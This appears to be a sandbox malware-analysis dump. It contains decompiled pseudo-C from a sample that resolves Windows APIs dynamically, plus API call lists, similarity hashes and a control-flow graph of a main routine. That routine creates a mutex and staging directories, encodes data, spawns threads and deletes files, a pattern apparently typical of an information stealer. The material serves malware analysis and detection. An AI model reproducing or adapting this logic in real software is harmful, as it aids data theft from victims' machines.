                                                                                					 *0x44a10c = GetProcAddress(_t127,  *0x449d48);
                                                                                					 *0x44a0fc = GetProcAddress(_t127,  *0x449e60);
                                                                                					_t30 = GetProcAddress(_t127,  *0x449b9c);
                                                                                					 *0x44a1e8 = _t30;
                                                                                				}
                                                                                				_t128 = _v12;
                                                                                				if(_t128 != 0) {
                                                                                					 *0x44a130 = GetProcAddress(_t128,  *0x449d3c);
                                                                                					 *0x44a0b4 = GetProcAddress(_t128, "CryptBinaryToStringA");
                                                                                					_t30 = GetProcAddress(_t128, "CryptStringToBinaryA");
                                                                                					 *0x44a198 = _t30;
                                                                                				}
                                                                                				if(_t122 != 0) {
                                                                                					 *0x44a140 = GetProcAddress(_t122,  *0x449f74);
                                                                                					 *0x44a134 = GetProcAddress(_t122,  *0x449e70);
                                                                                					 *0x44a188 = GetProcAddress(_t122,  *0x449c14);
                                                                                					 *0x44a208 = GetProcAddress(_t122,  *0x449fd4);
                                                                                					 *0x44a0bc = GetProcAddress(_t122,  *0x449d30);
                                                                                					 *0x44a1ec = GetProcAddress(_t122,  *0x449c78);
                                                                                					 *0x44a118 = GetProcAddress(_t122,  *0x449edc);
                                                                                					 *0x44a144 = GetProcAddress(_t122,  *0x449eb8);
                                                                                					 *0x44a0c0 = GetProcAddress(_t122,  *0x449fc4);
                                                                                					_t30 = GetProcAddress(_t122, "RegEnumValueA");
                                                                                					 *0x44a214 = _t30;
                                                                                				}
                                                                                				if(_t119 != 0) {
                                                                                					 *0x44a14c = GetProcAddress(_t119,  *0x449c98);
                                                                                					 *0x44a168 = GetProcAddress(_t119,  *0x449e9c);
                                                                                					 *0x44a1c8 = GetProcAddress(_t119,  *0x449e8c);
                                                                                					 *0x44a210 = GetProcAddress(_t119,  *0x449e68);
                                                                                					 *0x44a1f0 = GetProcAddress(_t119,  *0x449ca4);
                                                                                					 *0x44a150 = GetProcAddress(_t119,  *0x449e08);
                                                                                					 *0x44a0d8 = GetProcAddress(_t119,  *0x449fac);
                                                                                					 *0x44a224 = GetProcAddress(_t119,  *0x449d90);
                                                                                					 *0x44a178 = GetProcAddress(_t119,  *0x449ffc);
                                                                                					 *0x44a154 = GetProcAddress(_t119,  *0x449cb0);
                                                                                					 *0x44a0b0 = GetProcAddress(_t119,  *0x449dec);
                                                                                					 *0x44a13c = GetProcAddress(_t119,  *0x449fec);
                                                                                					_t30 = GetProcAddress(_t119, "InternetCrackUrlA");
                                                                                					 *0x44a114 = _t30;
                                                                                				}
                                                                                				_t129 = _v16;
                                                                                				if(_t129 != 0) {
                                                                                					 *0x44a0f8 = GetProcAddress(_t129,  *0x449cac);
                                                                                					 *0x44a0e0 = GetProcAddress(_t129,  *0x449f18);
                                                                                					 *0x44a0cc = GetProcAddress(_t129,  *0x449cd4);
                                                                                					 *0x44a1c4 = GetProcAddress(_t129,  *0x449eec);
                                                                                					 *0x44a190 = GetProcAddress(_t129,  *0x449e2c);
                                                                                					 *0x44a15c = GetProcAddress(_t129,  *0x449c2c);
                                                                                					_t30 = GetProcAddress(_t129,  *0x44a00c);
                                                                                					 *0x44a148 = _t30;
                                                                                				}
                                                                                				_t130 = _v20;
                                                                                				if(_t130 != 0) {
                                                                                					 *0x44a104 = GetProcAddress(_t130,  *0x449e30);
                                                                                					 *0x44a1c0 = GetProcAddress(_t130,  *0x449d10);
                                                                                					 *0x44a1d0 = GetProcAddress(_t130, "CoInitialize");
                                                                                					 *0x44a16c = GetProcAddress(_t130, "CreateStreamOnHGlobal");
                                                                                					_t30 = GetProcAddress(_t130, "GetHGlobalFromStream");
                                                                                					 *0x44a0d4 = _t30;
                                                                                				}
                                                                                				_t131 = _v24;
                                                                                				if(_t131 != 0) {
                                                                                					 *0x44a0c8 = GetProcAddress(_t131, "GetDesktopWindow");
                                                                                					 *0x44a1bc = GetProcAddress(_t131,  *0x449da8);
                                                                                					 *0x44a1a0 = GetProcAddress(_t131,  *0x449ef8);
                                                                                					 *0x44a0d0 = GetProcAddress(_t131,  *0x449f30);
                                                                                					 *0x44a204 = GetProcAddress(_t131,  *0x449f2c);
                                                                                					 *0x44a0c4 = GetProcAddress(_t131,  *0x449d0c);
                                                                                					 *0x44a1a4 = GetProcAddress(_t131,  *0x449e5c);
                                                                                					 *0x44a20c = GetProcAddress(_t131,  *0x449cbc);
                                                                                					 *0x44a218 = GetProcAddress(_t131, "GetWindowRect");
                                                                                					 *0x44a1e4 = GetProcAddress(_t131, "GetWindowDC");
                                                                                					_t30 = GetProcAddress(_t131, "CloseWindow");
                                                                                					 *0x44a200 = _t30;
                                                                                				}
                                                                                				_t132 = _v28;
                                                                                				if(_t132 != 0) {
                                                                                					 *0x44a1d4 = GetProcAddress(_t132,  *0x449d74);
                                                                                					 *0x44a0ec = GetProcAddress(_t132,  *0x449e98);
                                                                                					_t30 = GetProcAddress(_t132,  *0x449f24);
                                                                                					 *0x44a17c = _t30;
                                                                                				}
                                                                                				_t133 = _v32;
                                                                                				if(_t133 != 0) {
                                                                                					 *0x44a1f8 = GetProcAddress(_t133, "ShellExecuteExA");
                                                                                					 *0x44a164 = GetProcAddress(_t133, "SHFileOperationA");
                                                                                					_t30 = GetProcAddress(_t133, "SHGetFolderPathA");
                                                                                					 *0x44a1a8 = _t30;
                                                                                				}
                                                                                				_t134 = _v36;
                                                                                				if(_t134 != 0) {
                                                                                					 *0x44a230 = GetProcAddress(_t134, "PathMatchSpecW");
                                                                                					 *0x44a12c = GetProcAddress(_t134, "PathMatchSpecA");
                                                                                					 *0x44a1d8 = GetProcAddress(_t134, "StrCmpCA");
                                                                                					 *0x44a0e4 = GetProcAddress(_t134, "StrStrA");
                                                                                					_t30 = GetProcAddress(_t134, "PathFindFileNameA");
                                                                                					 *0x44a108 = _t30;
                                                                                				}
                                                                                				if(_v8 != 0) {
                                                                                					_t31 = GetProcAddress(_v8, "SymMatchString");
                                                                                					 *0x44a170 = _t31;
                                                                                					return _t31;
                                                                                				}
                                                                                				return _t30;
                                                                                			}





























                                                                                0x00419487
                                                                                0x0041948b
                                                                                0x004194a6
                                                                                0x004194ac
                                                                                0x004194b4
                                                                                0x004194c2
                                                                                0x004194d3
                                                                                0x004194e4
                                                                                0x004194f5
                                                                                0x00419506
                                                                                0x00419517
                                                                                0x00419528
                                                                                0x00419539
                                                                                0x0041954a
                                                                                0x0041955b
                                                                                0x0041956c
                                                                                0x0041957d
                                                                                0x0041958e
                                                                                0x0041959f
                                                                                0x004195b0
                                                                                0x004195c1
                                                                                0x004195d2
                                                                                0x004195dd
                                                                                0x004195f4
                                                                                0x00419605
                                                                                0x00419616
                                                                                0x00419627
                                                                                0x00419638
                                                                                0x00419649
                                                                                0x0041965a
                                                                                0x0041966b
                                                                                0x0041967c
                                                                                0x00419687
                                                                                0x00419687
                                                                                0x00419693
                                                                                0x0041969f
                                                                                0x004196a1
                                                                                0x004196ad
                                                                                0x004196bc
                                                                                0x004196ca
                                                                                0x004196d8
                                                                                0x004196e7
                                                                                0x004196f6
                                                                                0x004196f9
                                                                                0x00419704
                                                                                0x00419712
                                                                                0x00419720
                                                                                0x00419723
                                                                                0x0041972e
                                                                                0x00419731
                                                                                0x00419739
                                                                                0x0041974e
                                                                                0x00419760
                                                                                0x00419772
                                                                                0x00419784
                                                                                0x00419796
                                                                                0x0041979c
                                                                                0x004197a2
                                                                                0x004197a2
                                                                                0x004197a7
                                                                                0x004197ac
                                                                                0x004197c1
                                                                                0x004197d2
                                                                                0x004197d7
                                                                                0x004197dd
                                                                                0x004197dd
                                                                                0x004197e4
                                                                                0x004197fd
                                                                                0x0041980f
                                                                                0x00419821
                                                                                0x00419833
                                                                                0x00419845
                                                                                0x00419857
                                                                                0x00419869
                                                                                0x0041987b
                                                                                0x0041988d
                                                                                0x00419892
                                                                                0x00419898
                                                                                0x00419898
                                                                                0x0041989f
                                                                                0x004198b8
                                                                                0x004198ca
                                                                                0x004198dc
                                                                                0x004198ee
                                                                                0x00419900
                                                                                0x00419912
                                                                                0x00419924
                                                                                0x00419936
                                                                                0x00419948
                                                                                0x0041995a
                                                                                0x0041996c
                                                                                0x0041997e
                                                                                0x00419983
                                                                                0x00419989
                                                                                0x00419989
                                                                                0x0041998e
                                                                                0x00419994
                                                                                0x004199a9
                                                                                0x004199bb
                                                                                0x004199cd
                                                                                0x004199df
                                                                                0x004199f1
                                                                                0x00419a03
                                                                                0x00419a09
                                                                                0x00419a0f
                                                                                0x00419a0f
                                                                                0x00419a14
                                                                                0x00419a19
                                                                                0x00419a2e
                                                                                0x00419a40
                                                                                0x00419a51
                                                                                0x00419a62
                                                                                0x00419a67
                                                                                0x00419a6d
                                                                                0x00419a6d
                                                                                0x00419a72
                                                                                0x00419a77
                                                                                0x00419a8f
                                                                                0x00419aa1
                                                                                0x00419ab3
                                                                                0x00419ac5
                                                                                0x00419ad7
                                                                                0x00419ae9
                                                                                0x00419afb
                                                                                0x00419b0d
                                                                                0x00419b1e
                                                                                0x00419b2f
                                                                                0x00419b34
                                                                                0x00419b3a
                                                                                0x00419b3a
                                                                                0x00419b3f
                                                                                0x00419b44
                                                                                0x00419b59
                                                                                0x00419b6b
                                                                                0x00419b71
                                                                                0x00419b77
                                                                                0x00419b77
                                                                                0x00419b7c
                                                                                0x00419b81
                                                                                0x00419b95
                                                                                0x00419ba6
                                                                                0x00419bab
                                                                                0x00419bb1
                                                                                0x00419bb1
                                                                                0x00419bb6
                                                                                0x00419bbb
                                                                                0x00419bcf
                                                                                0x00419be0
                                                                                0x00419bf1
                                                                                0x00419c02
                                                                                0x00419c07
                                                                                0x00419c0d
                                                                                0x00419c0d
                                                                                0x00419c18
                                                                                0x00419c22
                                                                                0x00419c28
                                                                                0x00000000
                                                                                0x00419c28
                                                                                0x00419c2e

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,4124C941), ref: 00419481
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041949E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004194AC
                                                                                • GetProcAddress.KERNEL32(00000000,CreateThread), ref: 004194C7
                                                                                • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004194D8
                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004194E9
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 004194FA
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemInfo), ref: 0041950B
                                                                                • GetProcAddress.KERNEL32(00000000,WideCharToMultiByte), ref: 0041951C
                                                                                • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0041952D
                                                                                • GetProcAddress.KERNEL32(00000000,HeapAlloc), ref: 0041953E
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessHeap), ref: 0041954F
                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00419560
                                                                                • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00419571
                                                                                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00419582
                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00419593
                                                                                • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004195A4
                                                                                • GetProcAddress.KERNEL32(00000000,lstrlenA), ref: 004195B5
                                                                                • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004195C6
                                                                                • GetProcAddress.KERNEL32(00000000,lstrcpyA), ref: 004195D7
                                                                                • GetProcAddress.KERNEL32(00000000,MultiByteToWideChar), ref: 004195E8
                                                                                • GetProcAddress.KERNEL32(00000000,lstrcatA), ref: 004195F9
                                                                                • GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 0041960A
                                                                                • GetProcAddress.KERNEL32(00000000,FindNextFileA), ref: 0041961B
                                                                                • GetProcAddress.KERNEL32(00000000,FindClose), ref: 0041962C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 0041963D
                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0041964E
                                                                                • GetProcAddress.KERNEL32(00000000,lstrcpynA), ref: 0041965F
                                                                                • GetProcAddress.KERNEL32(00000000,GlobalLock), ref: 00419670
                                                                                • GetProcAddress.KERNEL32(00000000,GlobalSize), ref: 00419681
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 00419693
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196A1
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196B0
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196BE
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196CC
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196DB
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196EA
                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,4124C941), ref: 004196F9
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,?,?,?,?,?,?,?,4124C941), ref: 00419707
                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll,?,?,?,?,?,?,?,4124C941), ref: 00419715
                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll,?,?,?,?,?,?,?,4124C941), ref: 00419723
                                                                                • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?,?,?,?,?,4124C941), ref: 00419731
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419742
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419754
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419766
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419778
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041978A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041979C
                                                                                • GetProcAddress.KERNEL32(?), ref: 004197B5
                                                                                • GetProcAddress.KERNEL32(?,CryptBinaryToStringA), ref: 004197C6
                                                                                • GetProcAddress.KERNEL32(?,CryptStringToBinaryA), ref: 004197D7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004197F1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419803
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419815
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419827
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419839
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041984B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041985D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041986F
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419881
                                                                                • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 00419892
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198AC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198BE
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198D0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198E2
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004198F4
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419906
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419918
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041992A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041993C
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041994E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419960
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419972
                                                                                • GetProcAddress.KERNEL32(00000000,InternetCrackUrlA), ref: 00419983
                                                                                • GetProcAddress.KERNEL32(?), ref: 0041999D
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199AF
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199C1
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199D3
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199E5
                                                                                • GetProcAddress.KERNEL32(?), ref: 004199F7
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419A09
                                                                                • GetProcAddress.KERNEL32(4124C941), ref: 00419A22
                                                                                • GetProcAddress.KERNEL32(4124C941), ref: 00419A34
                                                                                • GetProcAddress.KERNEL32(4124C941,CoInitialize), ref: 00419A45
                                                                                • GetProcAddress.KERNEL32(4124C941,CreateStreamOnHGlobal), ref: 00419A56
                                                                                • GetProcAddress.KERNEL32(4124C941,GetHGlobalFromStream), ref: 00419A67
                                                                                • GetProcAddress.KERNEL32(?,GetDesktopWindow), ref: 00419A83
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419A95
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419AA7
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419AB9
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419ACB
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419ADD
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419AEF
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B01
                                                                                • GetProcAddress.KERNEL32(?,GetWindowRect), ref: 00419B12
                                                                                • GetProcAddress.KERNEL32(?,GetWindowDC), ref: 00419B23
                                                                                • GetProcAddress.KERNEL32(?,CloseWindow), ref: 00419B34
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B4D
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B5F
                                                                                • GetProcAddress.KERNEL32(?), ref: 00419B71
                                                                                • GetProcAddress.KERNEL32(?,ShellExecuteExA), ref: 00419B89
                                                                                • GetProcAddress.KERNEL32(?,SHFileOperationA), ref: 00419B9A
                                                                                • GetProcAddress.KERNEL32(?,SHGetFolderPathA), ref: 00419BAB
                                                                                • GetProcAddress.KERNEL32(?,PathMatchSpecW), ref: 00419BC3
                                                                                • GetProcAddress.KERNEL32(?,PathMatchSpecA), ref: 00419BD4
                                                                                • GetProcAddress.KERNEL32(?,StrCmpCA), ref: 00419BE5
                                                                                • GetProcAddress.KERNEL32(?,StrStrA), ref: 00419BF6
                                                                                • GetProcAddress.KERNEL32(?,PathFindFileNameA), ref: 00419C07
                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchString), ref: 00419C22
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: CloseHandle$CloseWindow$CoInitialize$CreateFileA$CreateMutexA$CreateStreamOnHGlobal$CreateThread$CryptBinaryToStringA$CryptStringToBinaryA$FindClose$FindFirstFileA$FindNextFileA$GetDesktopWindow$GetDriveTypeA$GetFileSize$GetHGlobalFromStream$GetLastError$GetLogicalDriveStringsA$GetProcessHeap$GetSystemInfo$GetUserDefaultLocaleName$GetWindowDC$GetWindowRect$GlobalLock$GlobalMemoryStatusEx$GlobalSize$HeapAlloc$InternetCrackUrlA$IsWow64Process$LocalFree$MultiByteToWideChar$PathFindFileNameA$PathMatchSpecA$PathMatchSpecW$ReadFile$RegEnumValueA$SHFileOperationA$SHGetFolderPathA$ShellExecuteExA$StrCmpCA$StrStrA$SymMatchString$WideCharToMultiByte$dbghelp.dll$gdiplus.dll$lstrcatA$lstrcpyA$lstrcpynA$lstrlenA$shell32.dll$shlwapi.dll
                                                                                • API String ID: 2238633743-4036764532
                                                                                • Opcode ID: 69b6baf35303f61df93d5ac65a9a2727521236eeb362dffef702e27190b6bdd7
                                                                                • Instruction ID: 07f7832c0971b884e85a4eddeb3f16a50d4046e20dfd1343392049383cda5db0
                                                                                • Opcode Fuzzy Hash: 69b6baf35303f61df93d5ac65a9a2727521236eeb362dffef702e27190b6bdd7
                                                                                • Instruction Fuzzy Hash: EB12987D985214AFE7019FB0AD4996B3BB5FB0B701B18853AF901D2270D7B94820EF5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 26 40b5ad-40b6f3 call 40115a call 419473 call 415610 call 415bb2 call 41551f call 40d431 * 2 call 402c34 * 4 49 40b6f5 26->49 50 40b6f7-40b70f CreateMutexA GetLastError 26->50 49->50 51 40b711-40b716 Sleep 50->51 52 40b71c 50->52 51->52 53 40b721-40b766 call 407dcb call 407e11 call 40a83e 52->53 60 40b768 53->60 61 40b76a-40b778 StrCmpCA 53->61 60->61 62 40b791-40b79d 61->62 63 40b77a-40b78e call 40410f call 40a958 61->63 64 40b7a1-40b7af StrCmpCA 62->64 65 40b79f 62->65 63->62 67 40b855-40b8ed call 41d251 call 417368 call 40cfb8 call 402c34 call 40d47c call 40cfb8 call 402c34 64->67 68 40b7b5-40b7fa call 407dee call 407e11 call 40a83e 64->68 65->64 103 40b8f1-40b905 CreateDirectoryA 67->103 104 40b8ef 67->104 84 40b7fc 68->84 85 40b7fe-40b80c StrCmpCA 68->85 84->85 87 40b825-40b831 85->87 88 40b80e-40b817 85->88 91 40b833 87->91 92 40b835-40b843 StrCmpCA 87->92 93 40b818-40b822 call 40410f call 40a958 88->93 91->92 92->67 96 40b845-40b850 Sleep 92->96 93->87 96->53 105 40b907 103->105 106 40b90c-40b930 SetCurrentDirectoryA call 40d337 103->106 104->103 105->106 109 40b932 106->109 110 40b934-40b982 CreateDirectoryA call 402c34 call 407d85 call 40d3fa 106->110 109->110 117 40b984 110->117 118 40b986-40b993 110->118 117->118 119 40b995 118->119 120 40b99a-40ba89 call 40ed7d call 40c606 call 407feb call 402c34 * 2 call 40381a call 40d47c call 40d3c3 call 417319 call 40d3c3 * 2 118->120 119->120 143 40ba8b 120->143 144 40ba8d-40bb2e call 40ef26 call 402c34 * 4 call 407b7e call 40aa08 call 40d337 120->144 143->144 161 40bb30 144->161 162 40bb32-40bb7d call 40aa08 call 402c34 call 40d337 144->162 161->162 169 40bb81-40bbcc call 40aa08 call 402c34 call 40d337 162->169 170 40bb7f 162->170 177 40bbd0-40bc1b call 40aa08 call 402c34 call 40d337 169->177 178 40bbce 169->178 170->169 185 40bc1d 177->185 186 40bc1f-40bc6a call 40aa08 call 402c34 call 40d337 177->186 178->177 185->186 193 40bc6c 186->193 194 40bc6e-40bcb9 call 40aa08 call 402c34 call 40d337 186->194 193->194 201 40bcbb 194->201 202 40bcbd-40bcff call 40aa08 call 402c34 call 40d337 194->202 201->202 209 40bd01 202->209 210 40bd03-40bd35 CreateDirectoryA call 402c34 call 40d337 202->210 209->210 215 40bd37 210->215 216 40bd39-40bd65 CreateDirectoryA call 402c34 call 40d337 210->216 215->216 221 40bd67 216->221 222 40bd69-40bd95 CreateDirectoryA call 402c34 call 40d337 216->222 221->222 227 40bd97 222->227 228 40bd99-40bdc5 CreateDirectoryA call 402c34 call 40d337 222->228 227->228 233 40bdc7 228->233 234 40bdc9-40bdf5 CreateDirectoryA call 402c34 call 40d337 228->234 233->234 239 40bdf7 234->239 240 40bdf9-40be25 CreateDirectoryA call 402c34 call 40d337 234->240 239->240 245 40be27 240->245 246 40be29-40befc SetCurrentDirectoryA call 402c34 call 40410f call 403c13 call 402c34 call 413f3c call 40410f 240->246 245->246 259 40bf00-40bf30 SetCurrentDirectoryA call 402c34 call 4036f6 call 40abd6 246->259 260 40befe 246->260 267 40bf36-40bf4f call 40d337 259->267 268 40bfb7-40bfcf call 40d337 259->268 260->259 273 40bf51 267->273 274 40bf53-40bf83 CreateDirectoryA call 402c34 call 40d337 267->274 275 40bfd1 268->275 276 40bfd3-40bfef SetCurrentDirectoryA call 402c34 268->276 273->274 291 40bf85 274->291 292 40bf87-40bfa9 SetCurrentDirectoryA call 402c34 274->292 275->276 282 40c061-40c067 276->282 283 40bff1-40c05c call 40d337 call 40dbba call 40d337 call 40c626 call 408fb7 call 402c34 276->283 286 40c069 call 417d56 282->286 287 40c06e-40c07a 282->287 283->282 286->287 289 40c07c 287->289 290 40c07e-40c0e7 SetCurrentDirectoryA call 40381a call 40d337 call 4175c4 287->290 289->290 312 40c0e9 290->312 313 40c0eb-40c130 call 408117 call 403960 call 402c34 290->313 291->292 301 40bfb0-40bfb6 call 409d7b 292->301 302 40bfab 292->302 301->268 302->301 312->313 323 40c142-40c149 313->323 324 40c132-40c140 313->324 326 40c15b-40c161 323->326 327 40c14b-40c159 323->327 325 40c18d-40c197 324->325 330 40c1f0-40c21f CreateThread 325->330 331 40c199-40c1b2 CryptBinaryToStringA 325->331 328 40c163-40c165 call 41d1a8 326->328 329 40c16a-40c188 326->329 327->325 328->329 329->325 332 40c221-40c223 330->332 333 40c275-40c285 CloseHandle 330->333 331->330 335 40c1b4-40c1cc GetProcessHeap HeapAlloc 331->335 336 40c224-40c22f 332->336 337 40c287-40c28f 333->337 338 40c29a call 41d357 333->338 335->330 339 40c1ce-40c1d6 335->339 341 40c231 336->341 342 40c23d-40c23f 336->342 337->338 343 40c291-40c298 call 407c94 337->343 346 40c29f-40c2b6 SetCurrentDirectoryA 338->346 344 40c1d8-40c1dc 339->344 345 40c1de-40c1ea CryptBinaryToStringA 339->345 347 40c233-40c237 341->347 348 40c24e-40c258 CreateThread 341->348 349 40c244 342->349 343->346 344->344 344->345 345->330 351 40c2b8 346->351 352 40c2bd-40c35a SHFileOperation call 4179da call 402c34 * 4 call 41deb4 346->352 347->348 353 40c239-40c23b 347->353 355 40c25e-40c273 Sleep 348->355 349->348 354 40c246-40c248 349->354 351->352 353->349 354->348 358 40c24a-40c24c 354->358 355->333 355->336 358->348 358->355
                                                                                C-Code - Quality: 81%
                                                                                			E0040B5AD(void* __ecx, long __edx, void* __eflags, void* __fp0) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				signed int _v24;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				char _v40;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				char _v60;
                                                                                				intOrPtr _v72;
                                                                                				signed int _v80;
                                                                                				char _v100;
                                                                                				char _v108;
                                                                                				char _v112;
                                                                                				char _v128;
                                                                                				char _v164;
                                                                                				char _v168;
                                                                                				char _v176;
                                                                                				char _v180;
                                                                                				char _v212;
                                                                                				char _v220;
                                                                                				char _v244;
                                                                                				char _v268;
                                                                                				char _v296;
                                                                                				char _v300;
                                                                                				char _v324;
                                                                                				char _v332;
                                                                                				char _v380;
                                                                                				char _v404;
                                                                                				char _v408;
                                                                                				char _v444;
                                                                                				char _v448;
                                                                                				char _v464;
                                                                                				char _v472;
                                                                                				char _v488;
                                                                                				char _v492;
                                                                                				char _v520;
                                                                                				char _v548;
                                                                                				char _v556;
                                                                                				char _v576;
                                                                                				char _v604;
                                                                                				char _v612;
                                                                                				char _v616;
                                                                                				char _v632;
                                                                                				char _v640;
                                                                                				char _v644;
                                                                                				char _v688;
                                                                                				char _v696;
                                                                                				char _v732;
                                                                                				char _v740;
                                                                                				char _v744;
                                                                                				char _v752;
                                                                                				char _v772;
                                                                                				char _v796;
                                                                                				char _v800;
                                                                                				char _v808;
                                                                                				char _v832;
                                                                                				char _v836;
                                                                                				char _v856;
                                                                                				char _v864;
                                                                                				char _v892;
                                                                                				char _v912;
                                                                                				char _v920;
                                                                                				char _v940;
                                                                                				char _v948;
                                                                                				char _v960;
                                                                                				long _v964;
                                                                                				char _v968;
                                                                                				char _v980;
                                                                                				char _v1000;
                                                                                				char _v1012;
                                                                                				intOrPtr _v1024;
                                                                                				char _v1028;
                                                                                				CHAR* _v1044;
                                                                                				char _v1048;
                                                                                				intOrPtr _v1072;
                                                                                				long _v1076;
                                                                                				char _v1084;
                                                                                				char _v1092;
                                                                                				char _v1095;
                                                                                				char _v1096;
                                                                                				char _v1097;
                                                                                				char _v1098;
                                                                                				char _v1099;
                                                                                				char _v1100;
                                                                                				intOrPtr _v1116;
                                                                                				char _v1120;
                                                                                				char _v1124;
                                                                                				char _v1128;
                                                                                				char _v1136;
                                                                                				char _v1148;
                                                                                				char _v1160;
                                                                                				intOrPtr _v1162;
                                                                                				long _v1166;
                                                                                				void* _v1168;
                                                                                				long _v1170;
                                                                                				short _v1172;
                                                                                				intOrPtr _v1176;
                                                                                				CHAR* _v1180;
                                                                                				intOrPtr _v1184;
                                                                                				struct _SHFILEOPSTRUCT _v1188;
                                                                                				int _v1192;
                                                                                				void _v1196;
                                                                                				void _v1200;
                                                                                				int _v1204;
                                                                                				long _v1208;
                                                                                				long _v1212;
                                                                                				long _v1216;
                                                                                				int _v1220;
                                                                                				intOrPtr _v1224;
                                                                                				char* _v1228;
                                                                                				int _v1232;
                                                                                				long _v1240;
                                                                                				intOrPtr _v1244;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t236;
                                                                                				signed int _t238;
                                                                                				void _t245;
                                                                                				void* _t246;
                                                                                				CHAR* _t256;
                                                                                				void* _t257;
                                                                                				long _t258;
                                                                                				char _t262;
                                                                                				void* _t263;
                                                                                				char _t264;
                                                                                				void* _t265;
                                                                                				void _t266;
                                                                                				void* _t267;
                                                                                				CHAR* _t274;
                                                                                				CHAR* _t276;
                                                                                				CHAR* _t279;
                                                                                				void* _t282;
